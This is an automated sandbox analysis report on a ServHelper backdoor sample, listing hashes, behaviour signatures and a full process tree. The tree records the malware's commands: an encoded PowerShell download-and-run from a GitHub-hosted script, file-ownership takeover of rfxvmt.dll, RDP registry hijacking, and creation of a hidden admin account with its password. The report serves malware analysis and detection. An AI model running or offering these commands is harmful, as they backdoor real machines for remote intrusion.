Analysis
-
max time kernel
140s -
max time network
116s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
23-09-2021 10:58
Static task
static1
Behavioral task
behavioral1
Sample
f71c575754e1f5890ad8b35afd08b8be.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
f71c575754e1f5890ad8b35afd08b8be.exe
Resource
win10v20210408
General
-
Target
f71c575754e1f5890ad8b35afd08b8be.exe
-
Size
5.9MB
-
MD5
f71c575754e1f5890ad8b35afd08b8be
-
SHA1
69803b96f3820fabd81c79d422a1fa2a72ccb699
-
SHA256
046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211
-
SHA512
32f7fab593c46efe2586825aff79688e4a688735bf950b351fe3bdffc4a9dff01da0b2d4a92acf4d4bd14aac362884bd264beced9e8b82fd3111e8ef8ef31301
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 12 1680 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid Process 1756 icacls.exe 1512 takeown.exe 912 icacls.exe 1796 icacls.exe 1096 icacls.exe 1984 icacls.exe 576 icacls.exe 1288 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule behavioral1/files/0x00040000000130d3-180.dat upx behavioral1/files/0x00050000000130d4-181.dat upx -
Loads dropped DLL 2 IoCs
Processes:
pid Process 1512 1512 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exepid Process 1796 icacls.exe 1096 icacls.exe 1984 icacls.exe 576 icacls.exe 1288 icacls.exe 1756 icacls.exe 1512 takeown.exe 912 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57f5f3ab-d7f3-40fe-a3e5-1a6c35df78d4 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_74f63159-5a13-4bbb-91e2-e37be0bd086b powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f983de21-c3bb-44e2-b6f5-0c365c3dd4ea powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fb555c4c-0ae6-4424-af79-18fb3a3aaf97 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b9aa181-fc7a-4893-aea9-2e521d4224cb powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4d2b0610-3df9-48d8-bedf-7ffac09872ba powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2ae97fb7-f357-43a8-8be4-56f2854f17fa powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d6515b0c-8624-4148-bde3-042f1ddc60cc powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QEM78RQ6WG4KQ9CY6Q77.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dd3b6dc7-71b0-4e1b-a3a2-8de42e3f6db3 powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_522a8724-33b1-4cba-ad87-054601d99678 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f4aa3bf0-8628-4d9c-a099-16dbaf8c402a powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exepowershell.exeWMIC.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90e9dec57ab0d701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Processes:
f71c575754e1f5890ad8b35afd08b8be.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 f71c575754e1f5890ad8b35afd08b8be.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 f71c575754e1f5890ad8b35afd08b8be.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2028 powershell.exe 2028 powershell.exe 1708 powershell.exe 1708 powershell.exe 1988 powershell.exe 1988 powershell.exe 1648 powershell.exe 1648 powershell.exe 2028 powershell.exe 2028 powershell.exe 2028 powershell.exe 1680 powershell.exe 1680 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid Process 472 1512 1512 1512 1512 -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
f71c575754e1f5890ad8b35afd08b8be.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid Process Token: SeDebugPrivilege 980 f71c575754e1f5890ad8b35afd08b8be.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeDebugPrivilege 1708 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 1648 powershell.exe Token: SeRestorePrivilege 1796 icacls.exe Token: SeAssignPrimaryTokenPrivilege 332 WMIC.exe Token: SeIncreaseQuotaPrivilege 332 WMIC.exe Token: SeAuditPrivilege 332 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 332 WMIC.exe Token: SeIncreaseQuotaPrivilege 332 WMIC.exe Token: SeAuditPrivilege 332 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1888 WMIC.exe Token: SeIncreaseQuotaPrivilege 1888 WMIC.exe Token: SeAuditPrivilege 1888 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1888 WMIC.exe Token: SeIncreaseQuotaPrivilege 1888 WMIC.exe Token: SeAuditPrivilege 1888 WMIC.exe Token: SeDebugPrivilege 1680 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
f71c575754e1f5890ad8b35afd08b8be.exepowershell.execsc.exenet.execmd.execmd.exedescription pid Process procid_target PID 980 wrote to memory of 2028 980 f71c575754e1f5890ad8b35afd08b8be.exe 26 PID 980 wrote to memory of 2028 980 f71c575754e1f5890ad8b35afd08b8be.exe 26 PID 980 wrote to memory of 2028 980 f71c575754e1f5890ad8b35afd08b8be.exe 26 PID 2028 wrote to memory of 860 2028 powershell.exe 28 PID 2028 wrote to memory of 860 2028 powershell.exe 28 PID 2028 wrote to memory of 860 2028 powershell.exe 28 PID 860 wrote to memory of 576 860 csc.exe 29 PID 860 wrote to memory of 576 860 csc.exe 29 PID 860 wrote to memory of 576 860 csc.exe 29 PID 2028 wrote to memory of 1708 2028 powershell.exe 30 PID 2028 wrote to memory of 1708 2028 powershell.exe 30 PID 2028 wrote to memory of 1708 2028 powershell.exe 30 PID 2028 wrote to memory of 1988 2028 powershell.exe 32 PID 2028 wrote to memory of 1988 2028 powershell.exe 32 PID 2028 wrote to memory of 1988 2028 powershell.exe 32 PID 2028 wrote to memory of 1648 2028 powershell.exe 34 PID 2028 wrote to memory of 1648 2028 powershell.exe 34 PID 2028 wrote to memory of 1648 2028 powershell.exe 34 PID 2028 wrote to memory of 1512 2028 powershell.exe 38 PID 2028 wrote to memory of 1512 2028 powershell.exe 38 PID 2028 wrote to memory of 1512 2028 powershell.exe 38 PID 2028 wrote to memory of 912 2028 powershell.exe 39 PID 2028 wrote to memory of 912 2028 powershell.exe 39 PID 2028 wrote to memory of 912 2028 powershell.exe 39 PID 2028 wrote to memory of 1796 2028 powershell.exe 40 PID 2028 wrote to memory of 1796 2028 powershell.exe 40 PID 2028 wrote to memory of 1796 2028 powershell.exe 40 PID 2028 wrote to memory of 1096 2028 powershell.exe 41 PID 2028 wrote to memory of 1096 2028 powershell.exe 41 PID 2028 wrote to memory of 1096 2028 powershell.exe 41 PID 2028 wrote to memory of 1984 2028 powershell.exe 42 PID 2028 wrote to memory of 1984 2028 powershell.exe 42 PID 2028 wrote to memory of 1984 2028 powershell.exe 42 PID 2028 wrote to memory of 576 2028 powershell.exe 43 PID 2028 wrote to memory of 576 2028 powershell.exe 43 PID 2028 wrote to memory of 576 2028 powershell.exe 43 PID 2028 wrote to memory of 1288 2028 powershell.exe 44 PID 2028 wrote to memory of 1288 2028 powershell.exe 44 PID 2028 wrote to memory of 1288 2028 powershell.exe 44 PID 2028 wrote to memory of 1756 2028 powershell.exe 45 PID 2028 wrote to memory of 1756 2028 powershell.exe 45 PID 2028 wrote to memory of 1756 2028 powershell.exe 45 PID 2028 wrote to memory of 1392 2028 powershell.exe 46 PID 2028 wrote to memory of 1392 2028 powershell.exe 46 PID 2028 wrote to memory of 1392 2028 powershell.exe 46 PID 2028 wrote to memory of 1592 2028 powershell.exe 47 PID 2028 wrote to memory of 1592 2028 powershell.exe 47 PID 2028 wrote to memory of 1592 2028 powershell.exe 47 PID 2028 wrote to memory of 788 2028 powershell.exe 48 PID 2028 wrote to memory of 788 2028 powershell.exe 48 PID 2028 wrote to memory of 788 2028 powershell.exe 48 PID 2028 wrote to memory of 976 2028 powershell.exe 49 PID 2028 wrote to memory of 976 2028 powershell.exe 49 PID 2028 wrote to memory of 976 2028 powershell.exe 49 PID 976 wrote to memory of 1000 976 net.exe 50 PID 976 wrote to memory of 1000 976 net.exe 50 PID 976 wrote to memory of 1000 976 net.exe 50 PID 2028 wrote to memory of 904 2028 powershell.exe 51 PID 2028 wrote to memory of 904 2028 powershell.exe 51 PID 2028 wrote to memory of 904 2028 powershell.exe 51 PID 904 wrote to memory of 1888 904 cmd.exe 52 PID 904 wrote to memory of 1888 904 cmd.exe 52 PID 904 wrote to memory of 1888 904 cmd.exe 52 PID 1888 wrote to memory of 1784 1888 cmd.exe 53
Processes
-
C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"1⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ls104fpr\ls104fpr.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC61B.tmp" "c:\Users\Admin\AppData\Local\Temp\ls104fpr\CSC622CADD0974E4B0DAA56CC5C7D64399.TMP"4⤵PID:576
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1512
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:912
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1096
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1984
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:576
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1288
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1756
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1392
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1592
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:788
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1000
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1872
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1772
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1136
-
C:\Windows\system32\net.exenet start TermService5⤵PID:1376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1232
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1764
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1388
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵PID:1736
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵PID:1700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:1016
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc moWz5s4P /add1⤵PID:1008
-
C:\Windows\system32\net.exenet.exe user wgautilacc moWz5s4P /add2⤵PID:1680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc moWz5s4P /add3⤵PID:1592
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵PID:1760
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵PID:1484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:652
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD1⤵PID:2040
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD2⤵PID:1732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD3⤵PID:1288
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵PID:1028
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵PID:1900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:748
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc moWz5s4P1⤵PID:1624
-
C:\Windows\system32\net.exenet.exe user wgautilacc moWz5s4P2⤵PID:1784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc moWz5s4P3⤵PID:1648
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1000
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:332
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1736
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1712
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2040
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8de5f094-a4ae-4f42-8280-957c75080955
MD52d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9011f76f-7953-4f97-8316-e345be343126
MD5d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_94144c56-6cda-4412-abc9-311f208061e1
MD5faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a160a425-a04d-4345-8b99-125c3aa879e4
MD57f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_af4a0e44-2aed-48ba-9258-107c4e11fb87
MD5e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ddcc38f0-356f-40a7-b836-2683b6387311
MD5a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb28edaf-f393-458c-b643-1f60042b3dc0
MD56f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
